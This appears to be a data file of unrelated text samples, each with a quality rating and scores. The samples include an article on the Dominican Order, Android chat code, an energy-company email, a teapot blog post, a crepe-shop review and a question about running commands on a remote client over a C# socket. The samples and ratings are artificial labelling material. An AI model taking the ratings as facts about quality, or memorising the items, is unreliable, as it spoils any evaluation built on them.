Lagrange (1855–1938), one of the leading international centres for biblical research. It is at the École Biblique that the famed Jerusalem Bible (both editions) was prepared. Likewise Cardinal Yves Congar was a product of the French province of the Order of Preachers. Doctrinal development has had an important place in the restoration of the Preachers. Several institutions, besides those already mentioned, played important parts. Such is the Biblical school at Jerusalem, open to the religious of the order and to secular clerics, which publishes the Revue Biblique. The Pontificium Collegium Internationale Angelicum, the future Pontifical University of Saint Thomas Aquinas, Angelicum established at Rome in 1908 by Master Hyacinth Cormier, opened its doors to regulars and seculars for the study of the sacred sciences. In addition to the reviews above are the Revue Thomiste, founded by Père Thomas Coconnier (d. 1908), and the Analecta Ordinis Prædicatorum (1893). Among numerous writers of the order in this period are: Cardinals Thomas Zigliara (d. 1893) and Zephirin González (d. 1894), two esteemed philosophers; Alberto Guillelmotti (d. 1893), historian of the Pontifical Navy, and historian Heinrich Denifle (d. 1905). During the Reformation, many of the monasteries of Dominican nuns were forced to close. One which managed to survive, and afterwards founded many new houses, was St Ursula's in Augsburg. In the seventeenth century, monasteries of Dominican women were often asked by their bishops to undertake apostolic work, particularly educating girls and visiting the sick. St Ursula's returned to an enclosed life in the eighteenth century, but in the nineteenth century, after Napoleon had closed many European women's monasteries, King Louis I of Bavaria in 1828 restored the Religious Orders of women in his realm, provided that the nuns undertook some active work useful to the State (usually teaching or nursing). In 1877, Bishop Ricards in South Africa requested that Augsburg send a group of nuns to start a teaching mission in King Williamstown. From this mission were founded many Third Order Regular congregations of Dominican sisters, with their own constitutions, though still following the Rule of Saint Augustine and affiliated to the Dominican Order. These include the Dominican Sisters of Oakford, KwazuluNatal (1881), the Dominican Missionary Sisters, Zimbabwe, (1890) and the Dominican Sisters of Newcastle, KwazuluNatal (1891). The Dominican Order has influenced the formation of other Orders outside of the Roman Catholic Church, such as the Anglican Order of Preachers which is a Dominican Order within the worldwide Anglican Communion. Since all members are not obliged to take solemn or simple vows of poverty, chastity, and obedience, it operates more like a third order with a third order style structure, with no contemporary or canonical ties to the historic order founded by Dominic of Guzman. Missions abroad The Pax Mongolica of the 13th and 14th centuries that united vast parts of the European-Asian continents enabled western missionaries to travel east. "Dominican friars were preaching the Gospel on the Volga Steppes by 1225 (the year following the establishment of the Kipchak Khanate by Batu), and in 1240 Pope Gregory IX despatched others to Persia and Armenia." The most famous Dominican was Jordanus de Severac who was sent first to Persia then in 1321, together with a companion (Nicolas of Pistoia) to India. Father Jordanus' work and observations are recorded in two letters he wrote to the friars of Armenia, and a book, Mirabilia, translated as Wonders of the East. Another Dominican, Father Recold of Monte Croce, worked in Syria and Persia. His travels took him from Acre to Tabriz, and on to Baghdad. There "he was welcomed by the Dominican fathers already there, and with them entered into a disputation with the Nestorians." Although a number of Dominicans and Franciscans persevered against the growing faith of Islam throughout the region, all Christian missionaries were soon expelled with Timur's death in 1405. By the 1850s, the Dominicans had half a million followers in the Philippines and well-established missions in the Chinese province of Fujian and Tonkin, Vietnam, performing thousands of baptisms each year. Divisions The Friars, Nuns, Sisters, Members of Priestly Fraternities of Saint Dominic, Dominican Laity and Dominican Youths together form the Order of Preachers. Nuns The Dominican nuns were founded by Dominic in 1206 even before he had established the friars in 1216. Dominican Nuns are consecrated to God and live the mission of the Order of Preachers to preach the Gospel for the salvation of souls through a life of prayer, penance, hearing the Word of God and contemplating the mysteries of Salvation. The Nuns of the Order of Preachers are to seek, ponder and call upon the Lord Jesus Christ in solitude so that the WORD proceeding from the mouth of God may not return to Him empty, but may accomplish those things for which It was sent. (Isaiah 55:10) Living in the heart of the Preaching Family, the nuns live in the WORD of God which the friars, sisters and laity preach. In the cloister the nuns devote themselves totally to God and perpetuate that singular gift which Dominic had of bearing sinners, the down-trodden and the afflicted in the inmost sanctuary of his compassion. They incarnate in their lives the cry of Dominic: “O Lord, what will become of sinners!” The nuns celebrated their 800th anniversary in 2006. Sisters Women have been part of the Dominican Order since the beginning, but distinct active congregations of Dominican sisters in their current form are largely a product of the nineteenth century and afterwards. They draw their origins both from the Dominican nuns and the communities of women tertiaries (lay women) who lived in their own homes and gathered regularly to pray and study: the most famous of these was the Mantellate attached to Saint Dominic's church in Siena, to which Catherine of Siena belonged. In the seventeenth century, some European Dominican monasteries (e.g. St Ursula's, Augsburg) temporarily became no longer enclosed, so they could engage in teaching or nursing or other work in response to pressing local need. Any daughter houses they founded, however, became independent. But in the nineteenth century, in response to increasing missionary fervor, monasteries were asked to send groups of women to found schools and medical clinics around the world. Large numbers of Catholic women traveled to Africa, the Americas, and the East to teach and support new communities of Catholics there, both settlers and converts. Owing to the large distances involved, these groups needed to be self-governing, and they frequently planted new self-governing congregations in neighboring mission areas in order to respond more effectively to the perceived pastoral needs. Following on from this period of growth in the nineteenth century, and another great period of growth in those joining these congregations in the 1950s, there are currently 24,600 Sisters belonging to 150 Dominican Religious Congregations present in 109 countries affiliated to Dominican Sisters International. As well as the friars, Dominican sisters live their lives supported by four common values, often referred to as the Four Pillars of Dominican Life, they are: community life, common prayer, study and service. Dominic called this fourfold pattern of life the "holy preaching". Henri Matisse was so moved by the care that he received from the Dominican Sisters that he collaborated in the design and interior decoration of their Chapelle du Saint-Marie du Rosaire in Vence, France. Priestly Fraternities of St. Dominic The Priestly Fraternities of St. Dominic are diocesan priests who are formally affiliated to the Order of Preachers (Dominicans) through a Rule of life that they profess, and so strive for evangelical perfection under the overall direction of the Dominican friars. The origins of the Dominican fraternities can be traced from the Dominican third Order secular, which then included both priests and lay persons as members. Now existing as a separate association from that of the laity, and with its own distinct rule to follow, the Priestly Fraternities of St. Dominic continues to be guided by the Order in embracing the gift of the spirituality of Dominic in the unique context of the diocesan priests. Along with the special grace of the Sacrament of Holy Orders, which helps them to perform the acts of the sacred ministry worthily, they receive new spiritual help from the profession, which makes them members of the Dominican Family and sharers in the grace and mission of the Order. While the Order provides them with these spiritual aids and directs them to their own sanctification, it leaves them free for the complete service of the local Church, under the jurisdiction of their own Bishop. Laity Lay Dominicans are governed by their own rule, the Rule of the Lay Fraternities of St. Dominic, promulgated by the Master in 1987. It is the fifth Rule of the Dominican Laity; the first was issued in 1285. Lay Dominicans are also governed by the Fundamental Constitution of the Dominican Laity, and their provinces provide a General Directory and Statutes. According to their Fundamental Constitution of the Dominican Laity, sec. 4, "They have a distinctive character in both their spirituality and their service to God and neighbor. As members of the Order, they share in its apostolic mission through prayer, study and preaching according to the state of the laity." Pope Pius XII, in Chosen Laymen, an Address to the Third Order of St. Dominic (1958), said, "The true condition of salvation is to meet the divine invitation by accepting the Catholic 'credo' and by observing the commandments. But the Lord expects more from you [Lay Dominicans], and the Church urges you to continue seeking the intimate knowledge of God and His works, to search for a more complete and valuable expression of this knowledge, a refinement of the Christian attitudes which derive from this knowledge." The two greatest saints among them are Catherine of Siena and Rose of Lima, who lived ascetic lives in their family homes, yet both had widespread influence in their societies. Today, there is a growing number of Associates who share the Dominican charism. Dominican Associates are Christian women and men; married, single, divorced, and widowed; clergy members and lay persons who were first drawn to and then called to live out the charism and continue the mission of the Dominican Order – to praise, to bless, to preach. Associates do not take vows, but rather make a commitment to be partners with vowed members, and to share the mission and charism of the Dominican Family in their own lives, families, churches, neighborhoods, workplaces, and cities. They are most often associated with a particular apostolic work of a congregation of active Dominican sisters. Dominican spirituality The Dominican emphasis on learning and on charity distinguishes it from other monastic and mendicant orders. As the order first developed on the European continent, learning continued to be emphasized by these friars and their sisters in Christ. These religious also struggled for a deeply personal, intimate relationship with God. When the order reached England, many of these attributes were kept, but the English gave the order additional, specialized characteristics. Humbert of Romans Humbert of Romans, the master general of the order from 1254 to 1263, was a great administrator, as well as preacher and writer. It was under his tenure as master general that the sisters in the order were given official membership. He also wanted his friars to reach excellence in their preaching, and this was his most lasting contribution to the order. Humbert is at the center of ascetic writers in the Dominican Order. He advised his readers, "[Young Dominicans] are also to be instructed not to be eager to see visions or work miracles, since these avail little to salvation, and sometimes we are fooled by them; but rather they should be eager to do good in which salvation consists. Also, they should be taught not to be sad if they do not enjoy the divine consolations they hear others have; but they should know the loving Father for some reason sometimes withholds these. Again, they should learn that if they lack the grace of compunction or devotion they should not think they are not in the state of grace as long as they have good will, which is all that God regards".</ref> The English Dominicans took this to heart, and made it the focal point of their mysticism. Mysticism By 1300, the enthusiasm for preaching and conversion within the order lessened. Mysticism, full of the ideas Albertus Magnus expostulated, became the devotion of the greatest minds and hands within the organization. It became a "powerful instrument of personal and theological transformation both within the Order of Preachers and throughout the wider reaches of Christendom. Although Albertus Magnus did much to instill mysticism in the Order of Preachers, it is a concept that reaches back to the Hebrew Bible. In the tradition of Holy Writ, the impossibility of coming face to face with God is a recurring motif, thus the commandment against graven images (Exodus 20.4–5). As time passed, Jewish and early Christian writings presented the idea of 'unknowing,' where God's presence was enveloped in a dark cloud. All of these ideas associated with mysticism were at play in the spirituality of the Dominican community, and not only among the men. In Europe, in fact, it was often the female members of the order, such as Catherine of Siena, Mechthild of Magdeburg, Christine of Stommeln, Margaret Ebner, and Elsbet Stagl, that gained reputations for having mystical experiences. Notable male members of the order associated with mysticism include Meister Eckhart and Henry Suso. Saint Albertus Magnus Another who contributed significantly to the spirituality of the order is Saint Albert the Great, influence on the brotherhood permeated nearly every aspect of Dominican life. One of Albert's greatest contributions was his study of Dionysius the Areopagite, a mystical theologian whose words left an indelible imprint in the medieval period. Magnus' writings made a significant contribution to German mysticism, which became vibrant in the minds of the Beguines and women such as Hildegard of Bingen and Mechthild of Magdeburg. Mysticism refers to the conviction that all believers have the capability to experience God's love. This love may manifest itself through brief ecstatic experiences, such that one may be engulfed by God and gain an immediate knowledge of Him, which is unknowable through the intellect alone. Albertus Magnus championed the idea, drawn from Dionysus, that positive knowledge of God is possible, but obscure. Thus, it is easier to state what God is not, than to state what God is: "... we affirm things of God only relatively, that is, casually, whereas we deny things of God absolutely, that is, with reference to what He is in Himself. And there is no contradiction between a relative affirmation and an absolute negation. It is not contradictory to say that someone is white-toothed and not white". Albert the Great wrote that wisdom and understanding enhance one's faith in God. According to him, these are the tools that God uses to commune with a contemplative. Love in the soul is both the cause and result of true understanding and judgement. It causes not only an intellectual knowledge of God, but a spiritual and emotional knowledge as well. Contemplation is the means whereby one can obtain this goal of understanding. Things that once seemed static and unchanging become full of possibility and perfection. The contemplative then knows that God is, but she does not know what God is. Thus, contemplation forever produces a mystified, imperfect knowledge of God. The soul is exalted beyond the rest of God's creation but it cannot see God Himself. English Dominican mysticism Concerning humanity as the image of Christ, English Dominican spirituality concentrated on the moral implications of image-bearing rather than the philosophical foundations of the imago Dei. The process of Christ's life, and the process of image-bearing, amends humanity to God's image. The idea of the "image of God" demonstrates both the ability of man to move toward God (as partakers in Christ's redeeming sacrifice), and that, on some level, man is always an image of God. As their love and knowledge of God grows and is sanctified by faith and experience, the image of God within man becomes ever more bright and clear. English Dominican mysticism in the late medieval period differed from European strands of it in that, whereas European Dominican mysticism tended to concentrate on ecstatic experiences of union with the divine, English Dominican mysticism's ultimate focus was on a crucial dynamic in one's personal relationship with God. This was an essential moral imitation of the Savior as an ideal for religious change, and as the means for reformation of humanity's nature as an image of divinity. This type of mysticism carried with it four elements. First, spiritually it emulated the moral essence of Christ's life. Second, there was a connection linking moral emulation of Christ's life and humanity's disposition as images of the divine. Third, English Dominican mysticism focused on an embodied spirituality with a structured love of fellow men at its center. Finally, the supreme aspiration of this mysticism was either an ethical or an actual union with God. For English Dominican mystics, the mystical experience was not expressed just in one moment of the full knowledge of God, but in the journey of, or process of, faith. This then led to an understanding that was directed toward an experiential knowledge of divinity. It is important to understand, however, that for these mystics it was possible to pursue mystical life without the visions and voices that are usually associated with such a relationship with God. They experienced a mystical process that allowed them, in the end, to experience what they had already gained knowledge of through their faith only. The centre of all mystical experience is, of course, Christ. English Dominicans sought to gain a full knowledge of Christ through an imitation of His life. English mystics of all types tended to focus on the moral values that the events in Christ's life exemplified. This led to a "progressive understanding of the meanings of Scripture—literal, moral, allegorical, and anagogical"—that was contained within the mystical journey itself. From these considerations of Scripture comes the simplest way to imitate Christ: an emulation of the moral actions and attitudes that Jesus demonstrated in His earthly ministry becomes the most significant way to feel and have knowledge of God. The English concentrated on the spirit of the events of Christ's life, not the literality of events. They neither expected nor sought the appearance of the stigmata or any other physical manifestation. They wanted to create in themselves that environment that allowed Jesus to fulfill His divine mission, insofar as they were able. At the center of this environment was love: the love that Christ showed for humanity in becoming human. Christ's love reveals the mercy of God and His care for His creation. English Dominican mystics sought through this love to become images of God. Love led to spiritual growth that, in turn, reflected an increase in love for God and humanity. This increase in universal love allowed men's wills to conform to God's will, just as Christ's will submitted to the Father's will. Charity and meekness As the image of God grows within man, he learns to rely less on an intellectual pursuit of virtue and more on an affective pursuit of charity and meekness. Thus, man then directs his path to that One, and the love for, and of, Christ guides man's very nature to become centered on the One, and on his neighbor as well. Charity is the manifestation of the pure love of Christ, both for and by His follower. Although the ultimate attainment for this type of mysticism is union with God, it is not necessarily visionary, nor does it hope only for ecstatic experiences; instead, mystical life is successful if it is imbued with charity. The goal is just as much to become like Christ as it is to become one with Him. Those who believe in Christ should first have faith in Him without becoming engaged in such overwhelming phenomena. The Dominican Order was affected by a number of elemental influences. Its early members imbued the order with a mysticism and learning. The Europeans of the order embraced ecstatic mysticism on a grand scale and looked to a union with the Creator. The English Dominicans looked for this complete unity as well, but were not so focused on ecstatic experiences. Instead, their goal was to emulate the moral life of Christ more completely. The Dartford nuns were surrounded by all of these legacies, and used them to create something unique. Though they are not called mystics, they are known for their piety toward God and their determination to live lives devoted to, and in emulation of, Him. Rosary Devotion to the Virgin Mary was another very important aspect of Dominican spirituality. As an order, the Dominicans believed that they were established through the good graces of Christ's mother, and through prayers she sent missionaries to save the souls of nonbelievers. Dominican brothers and sisters who were unable to participate in the Divine Office sang the Little Office of the Blessed Virgin each day and saluted her as their advocate. Throughout the centuries, the Holy Rosary has been an important element among the Dominicans. Pope Pius XI stated that: "The Rosary of Mary is the principle and foundation on which the very Order of Saint Dominic rests for making perfect the life of its members and obtaining the salvation of others." Histories of the Holy Rosary often attribute its origin to Dominic himself through the Virgin Mary. Our Lady of the Rosary is the title related to the Marian apparition to Dominic in 1208 in the church of Prouille in which the Virgin Mary gave the Rosary to him. For centuries, Dominicans have been instrumental in spreading the rosary and emphasizing the Catholic belief in the power of the rosary. On January 1, 2008, the master of the order declared a year of dedication to the Rosary. Mottoes Laudare, benedicere, praedicare To praise, to bless and to preach (from the Dominican Missal, Preface of the Blessed Virgin Mary) Veritas Truth Contemplare et contemplata aliis tradere To study and to hand on the fruits of study (or, to contemplate and to hand on the fruits of contemplation) One in faith, hope, and love Notable members List of Dominican friars By geography Dominican Republic Croatian Dominican Province Dominicans in Ireland Dominican Order in the United States Educational institutions Albertus Magnus College, New Haven, Connecticut, United States – est.1925 Angelicum School Iloilo, Iloilo City, Philippines – est. 1978 Aquinas College (Michigan), Grand Rapids, Michigan, United States – est. 1886 Aquinas Institute of Theology, St. Louis, Missouri, United States – est. 1939 Aquinas School, San Juan, Metro Manila, Philippines – est. 1965 Barry University, Miami Shores, Florida, United States – est. 1940 Bishop Lynch High School, Dallas, Texas, United States - est. 1963 Blackfriars Hall, Oxford, United Kingdom Blackfriars Priory School, Prospect, South Australia, Australia – est. 1953 Blessed Imelda's School, Taipei, Taiwan – est. 1916 Cabra Dominican College, Adelaide, South Australia, Australia – est. 1886 Caldwell University, Caldwell, New Jersey, United States – est. 1939 Catholic Dominican School, Yigo, Guam – est. 1995 Colegio de San Juan de Letran, Bataan, Abucay, Bataan, Philippines Colegio de San Juan de Letran, Calamba, Philippines Colegio de San Juan de Letran, Intramuros, Philippines – est. 1620 Colegio de San Juan de Letran, Manaoag (formerly Our Lady of Manaoag College), Manaoag, Pangasinan, Philippines Colegio Lacordaire, Cali, Colombia – est. 1956 Dominican College of San Juan, San Juan, Metro Manila, Philippines Dominican College of Santa Rosa, Santa Rosa, Laguna, Philippines – est. 1994 Dominican College of Tarlac, Capas, Tarlac, Philippines – est. 1947 Dominican Convent High School, Bulawayo, Bulawayo, Zimbabwe – est. 1956 Dominican Convent High School, Harare, Zimbabwe – est. 1892 Dominican International School, Kaohsiung, Taiwan – est. 1953 Dominican International School, Taipei City, Taiwan – est. 1957 Dominican School Manila, Sampaloc, Manila, Philippines – est. 1958 Dominican School of Calabanga, Calabanga, Metro Naga, Camarines Sur, Philippines Dominican School of Philosophy and Theology, Berkeley, California, United States – est. 1861 Dominican University College, Ottawa, Ontario, Canada – est. 1900 Dominican University (Illinois), River Forest, Illinois, United States – est. 1901 Dominican University of California, San Rafael, California, United States – est. 1890 Edgewood College, Madison, Wisconsin, United States – est. 1927 Emerald Hill School, Zimbabwe, Harare, Zimbabwe Fenwick High School, Oak Park, Illinois, United States – est. 1929 Holy Rosary School of Pardo, El Pardo, Cebu Ciyy, Philippines – est. 1965 Holy Trinity University, Puerto Princesa City, Philippines – est. 1940 Marian Catholic High School, Chicago Heights, Illinois, United States – est. 1958 Molloy College, Rockville Centre, New York, United States – est. 1955 Mount Saint Mary College, Newburgh, New York, United States Newbridge College, Newbridge, Co. Kildare, Republic of Ireland Ohio Dominican University, Columbus, Ohio, United States Pontifical Faculty of the Immaculate Conception Pontifical University of Saint Thomas Aquinas Providence College, Providence, Rhode Island, United States San Pedro College, Davao City Santa Sabina Dominican College, Dublin Siena College of Quezon City Siena College of Taytay, Taytay, Rizal Siena College, Camberwell, Victoria, Australia St Agnes Academy, Houston, Texas, United States – est. 1905 St Dominic's Chishawasha, Zimbabwe St Dominic's College, Henderson, Auckland, New Zealand St Dominic's College, Wanganui, New Zealand St. Catharine College, St. Catharine, Kentucky, United States St. John's High School (Harare), Zimbabwe St. Mary's Dominican High School, New Orleans, Louisiana, United States St. Michael Academy, Northern Samar, Philippines St. Rose of Lima School, Bacolod City, Philippines Superior Institute of Religious Sciences of St. Thomas Aquinas The Pontifical and Royal University of Santo Tomas, The Catholic University of the Philippines – est. 1611 Universidad Santo Tomas de Aquino, Bogota, Colombia Universidad Santo Tomas de Aquino, Santo Domingo, Dominican Republic, est. 1538 – First University of the New World University of Santo Tomas-Legazpi (formerly Aquinas University of Legazpi), Legazpi City, Albay – est. 1948 UST-Angelicum College (formerly Angelicum College), Quezon City, Philippines – est. 1972 See also Anglican Order of Preachers Blackfriars (disambiguation), many name places in Britain testifying to former Dominican presence Community of the Lamb, a new branch of the Dominican Order, founded in 1983 Dominican Nuns of the Perpetual Rosary Dominican Rite, the Separate Use for Dominicans in the Latin Church Dominican Sisters of Mary, Mother of the Eucharist Dominican Sisters of St. Cecilia List of saints of the Dominican Order Master of the Order of Preachers Sainte Marie de La Tourette, modernist Dominican monastery designed by Le Corbusier Spanish Inquisition St Dominic's Priory Church, the residence of the Provincial of the Dominican friars in England and Scotland The Blackfriars of Shrewsbury Third Order of Saint Dominic Thomistic sacramental theology Thought of Thomas Aquinas References Notes Citations Sources External links Order of Preachers Homepage – Available in English, French and Spanish Dominican Observer – weekly magazine of Dominican friars The Dominican Monastery of St. Jude in Marbury, Alabama Our Lady of the Holy Rosary Monastery in Buffalo NY (A Dominican contemplative monastery with Latin chant) Dominican School of Philosophy and Theology Lectures in Dominican History Online Resource Library Greyfriars and Blackfriars, BBC Radio 4 discussion with Henrietta Leyser, Anthony Kenny & Alexander Murray (In Our Time, Nov.10, 2005) Category:1216 establishments in Europe Category:Catholic orders and societies Category:Catholic religious orders established in the 13th century Category:Christian religious orders established in the 13th century Category:Dominican spirituality Category:Inquisition | High | [
0.6781326781326781,
34.5,
16.375
] |
package com.itheima.leon.qqdemo.widget; import android.content.Context; import android.graphics.drawable.AnimationDrawable; import android.util.AttributeSet; import android.view.LayoutInflater; import android.widget.ImageView; import android.widget.RelativeLayout; import android.widget.TextView; import com.hyphenate.chat.EMMessage; import com.hyphenate.chat.EMMessageBody; import com.hyphenate.chat.EMTextMessageBody; import com.hyphenate.util.DateUtils; import com.itheima.leon.qqdemo.R; import java.util.Date; import butterknife.BindView; import butterknife.ButterKnife; /** * 创建者: Leon * 创建时间: 2016/10/20 12:47 * 描述： TODO */ public class SendMessageItemView extends RelativeLayout { @BindView(R.id.send_message) TextView mSendMessage; @BindView(R.id.send_message_progress) ImageView mSendMessageProgress; @BindView(R.id.timestamp) TextView mTimestamp; public SendMessageItemView(Context context) { this(context, null); } public SendMessageItemView(Context context, AttributeSet attrs) { super(context, attrs); init(); } private void init() { LayoutInflater.from(getContext()).inflate(R.layout.view_send_message_item, this); ButterKnife.bind(this, this); } public void bindView(EMMessage emMessage, boolean showTimestamp) { updateTimestamp(emMessage, showTimestamp); updateMessageBody(emMessage); updateSendingStatus(emMessage); } private void updateTimestamp(EMMessage emMessage, boolean showTimestamp) { if (showTimestamp) { mTimestamp.setVisibility(VISIBLE); String time = DateUtils.getTimestampString(new Date(emMessage.getMsgTime())); mTimestamp.setText(time); } else { mTimestamp.setVisibility(GONE); } } private void updateMessageBody(EMMessage emMessage) { EMMessageBody body = emMessage.getBody(); if (body instanceof EMTextMessageBody) { mSendMessage.setText(((EMTextMessageBody) body).getMessage()); } else { mSendMessage.setText(getContext().getString(R.string.no_text_message)); } } private void updateSendingStatus(EMMessage emMessage) { switch (emMessage.status()) { case INPROGRESS: mSendMessageProgress.setVisibility(VISIBLE); mSendMessageProgress.setImageResource(R.drawable.send_message_progress); AnimationDrawable drawable = (AnimationDrawable) mSendMessageProgress.getDrawable(); drawable.start(); break; case SUCCESS: mSendMessageProgress.setVisibility(GONE); break; case FAIL: mSendMessageProgress.setImageResource(R.mipmap.msg_error); break; } } } | Mid | [
0.573333333333333,
32.25,
24
] |
I don't find any reason why IP-ID encoding in ipv4 irregular chain, should be dependent on ECN flags. --VERIFIER NOTES-- "This errata is invalid. Those bits need to be bound in the format and needs to be done so in the irregular chain for the inner header which does special treatment for these." pad_len has the potential to become Inferred field, by doing this we can save one byte in compressed header and can effectively increase the compression efficiency. --VERIFIER NOTES-- Rejected, as this is not an errata, as the 'corrected text' is in fact a change to the formal definition of the header formats. | Low | [
0.47461368653421604,
26.875,
29.75
] |
Russ/Ben Here is Lincoln's response to our questions. You may want to get with Sandra to discuss this ---------------------- Forwarded by Oscar Dalton/HOU/ECT on 01/20/2000 08:51 AM --------------------------- "Rich Kosch" <[email protected]> on 01/20/2000 08:48:03 AM To: Oscar Dalton/HOU/ECT@ECT cc: Subject: Re: Questions Assume an 8% cost of money(taxable) and 25 year amortizaton schedule per our Financial people. Assume also that we will need to include a bond reserve fund of equal to one years P and I plus about 1.5% financing costs. The latter two simulates the cost of taxexempt financing requirements. which we are assuming taxable will be in the same ballpark of requirements. Again the $545 does not include an SCR. When we got our PSD permit for our Rokeby 3 unit, the informal quotes we got for that unit were in the 1.6 to 2.0 Million dollar range. In the end, we proved to EPA that the addition was not cost effective by some convoluted economic analysis they made us go thru. However it became very obvious to us, this is their next regulatory objective. We were so convinced that our Rokeby3 was going to need an SCR we had internally resigned ourselves to that unpleasant assumption. We would assume a 45mw unit's cost would be about 2/3 the cost of this larger unit 90MW machine ie Rokeby 3.. "Oscar Dalton" <[email protected]> on 01/19/2000 06:26:34 PM To: Rich Kosch/LES@LES cc: Subject: Questions Rich, In working through our analysis for the revised proposal to Lincoln, I had the following questions: 1. In Lincoln's cost estimate of $545/kw, did this include SCR's? 2. Under taxable financing, what interest rate and repayment period would Lincoln normally find acceptable? Any input you could provide would be appreciated. Thanks Oscar | Low | [
0.529774127310061,
32.25,
28.625
] |
Linderhof Gardening, Cooking and Decorating on the Prairie of Kansas Welcome to Linderhof, our 1920's home on the prairie, where there's usually something in the oven, flowers in the garden for tabletops and herbs in the garden for cooking. Where, when company comes, the teapot is always on and there are cookies and cakes to share in the larder. Tuesday, February 26, 2013 The Teapots of Linderhof I don't "collect" teapots I've never considered myself a collector But I do like teapots And more than one has found it's home at Linderhof over the years And it's years, too -- for I've had some of these for 20 years or more The Wee Blue Ones Burleigh's Asiatic Pheasant It holds two cups -- not mugs -- but cups Perfect for tea for one Johnson Brothers Indies It's small and holds perhaps three cups Bought on a trip to England Because I loved the tea service in the bed breakfasts we stayed in And I felt that Linderhof should have a tea "station" in the bedroom I bought the pot, a wee creamer and sugar, and two cups and saucers And hand carried them home I did set up the station -- But not for long For you had to take the dirty dishes downstairs, wash them and tote them back up! It was far easier to go downstairs for my first cup of tea. But it is my favorite "tea for one" pot and I use it a lot for tea at half past three when it is just me. The Spode Blue Ones The Blue Room pattern. A Christmas gift from Husband Jim because I didn't have a "big" blue teapot! Blue Italian Bought in Canada Because it was so much cheaper there. I loved the shape and even though I had a Blue Room, I felt that I need a Blue Italian teapot as well. The Silver The teapot that goes with my silver tea service. It's the Plymouth pattern and is a rather plain Colonial pattern My grandmother's teapot. It's really a coffeepot, but it works well for tea If she had any other pieces of silver, I don't remember them. Perhaps, it belonged to her mother or grandmother? But whatever it's heritage, I'm glad it resides at Linderhof and is a reminder of my dear grandmother. And old silver one From an Estate Sale It turned out to be older than I thought I love it's round almost onion shape I traded a meal out for the pot -- I didn't go and so "saved" the money I would have spent on dinner -- that money went to buy the pot! The Miscellany Old Paris Mid 1800s I collect gold and white china And didn't have a teapot Which came with creamer and sugar and cups and saucers and a few "oddments" It's special and not used all that much Used mostly for special teas! Aynsley Pembroke It's bone china So a company teapot It goes with my "collection" of Asian bird and chrysanthemum china. It was bought specifically to go with those cups and saucers. Wedgwood Asiatic Pheasant It's transferware -- not china And although it's blue it's more of a turquoise blue rather than the blue one thinks of when one thinks of English transfer ware. Dear Martha, thank you for the lovely tour of your tea pots on this cold, snowy morning. I love them all, but the Blue Italian might be my favorite! I had to stop my tea two months ago for health reasons. It has been so hard! My tea pots are silent reminders, looking lonely. Maybe someday soon I can add a little tea back but for now it is cold turkey on the tea! Martha,What an amazing and unique collection of Tea Pots, dear friend!!! While all are lovely, I was quite smitten with the silver tea pot with the onion shape!!! Thank you for sharing your refined collection with us!Fondly,Pat | Mid | [
0.553488372093023,
29.75,
24
] |
A&E Hangouts: Crepes of Wrath offers both savory and sweet crepes By MIA ARANDA Crepes of Wrath is a business located in Downtown Redlands that serves delicious, sweet and savory crepes. While wrath means fierce anger, it is vital to know before coming to Crepes of Wrath that the crepes are not angry, instead are quite enjoyable. Crepes of Wrath offers many combinations of ingredients that are crafted into a crepe. Although savory crepes are $11 each, which might sound pricy for a dessert, they can actually be considered a meal due to the large size and the meats inside it. Types of savory crepes offered here include Alfredo, made with chicken, spinach, parmesan and alfredo, or Thanksgiving, with turkey, gravy, cranberry and stuffing. If you are looking for a dessert rather than a light meal, sweet crepes are the perfect alternative. Costing $9 each, sweet crepes contain fruits, such as strawberries, bananas and apples, as well as fillings like Nutella, honey and peanut butter; however, the price of sweet crepes can be slightly expensive due to the minimal toppings. Here is Crepes of Wrath’s menu consisting of both sweet and savory crepes as of Sept. 15, 2018. If you don’t want the crepes already put together, you can always make your own by choosing a batter, filling, and meat or fruit. (MIA ARANDA/ Ethic news) If you don’t like what is on the menu, you can make your own by choosing your filling, batter, and fruit or meat. In addition, children 12 years old and younger are able to get a $9 savory crepe and a $7 sweet crepe as a smaller portion. Pictured above are three sweet crepes offered at Crepes of Wrath in Redlands. Along with the “Jessica,” consisting of lemon curd, blueberries, raspberries, sweet cream, there is also the “Jill” stuffed with strawberries, honey, and sweet cream, and the “Most Popular,” containing of nutella, strawberries, and bananas. Each sweet crepe costs $9 each and $7 each for children. (MIA ARANDA/ Ethic News) Crepes of Wrath, like many other shops in Downtown Redlands, has a small shop, so it tends to get crowded quickly. While there is no seating, there is a counter where you can stand and enjoy your crepe directly outside. If you don’t want to stand or possibly eat in the sun, Orange Street Alley is available to walk to with Instagram worthy murals and umbrellas hanging from wires above for decoration along with seating. Their customer service is outstanding because the employees are always friendly. The only other negative is that they occasionally blast explicit music without a care for their customers waiting inside, creating an unprofessional atmosphere. My overall rating for this business is a 4 out of 5 due to their explicit music choice and lack of outdoor seating directly outside. The small wooden building is often looked past due to a couple of trash cans in front of the business and the bold “WE BUY GOLD” sign to the right of the orange Crepes of Wrath sign, making the eatery look even smaller than it already is. www.printingcenterusa.com Readers rely on Ethic News for high quality, reliable information and entertainment, and every year Ethic News relies on PrintingCenterUSA to print our high quality, professional magazines that preserve student content. Check them out at the link below! https://www.printingcenterusa.com/printing/magazine-printing | Mid | [
0.538922155688622,
33.75,
28.875
] |
Q: Run command through a c# socket I'm writing a c# application which connects to a remote server for doing stuff. I'm already able to copy files to the client, and what I wish to do now, after I finished copying all the files is send a "command signal" through my Socket, and make the client run it. Just for the example, this is what I wish to do: string cmD = @"\\192.168.0.1\\cmd"; byte[] clientData = new byte[8000]; clientData = System.Text.Encoding.UTF8.GetBytes(cmD); clientSock.Send(clientData); Let's assume that clientSock is the static Socket connected to my server. In this case, I would like to run "cmd" on the client side. Any ideas? A: In the end, you have not asked anything. Could you please detail what exactly would you like to ask? Anyway, I guess you are trying to run a command in the remote server so, you will have to implement it in your C# server. To run commands, you can use Process::Start() method. Good luck! Cheers, | Mid | [
0.646900269541778,
30,
16.375
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.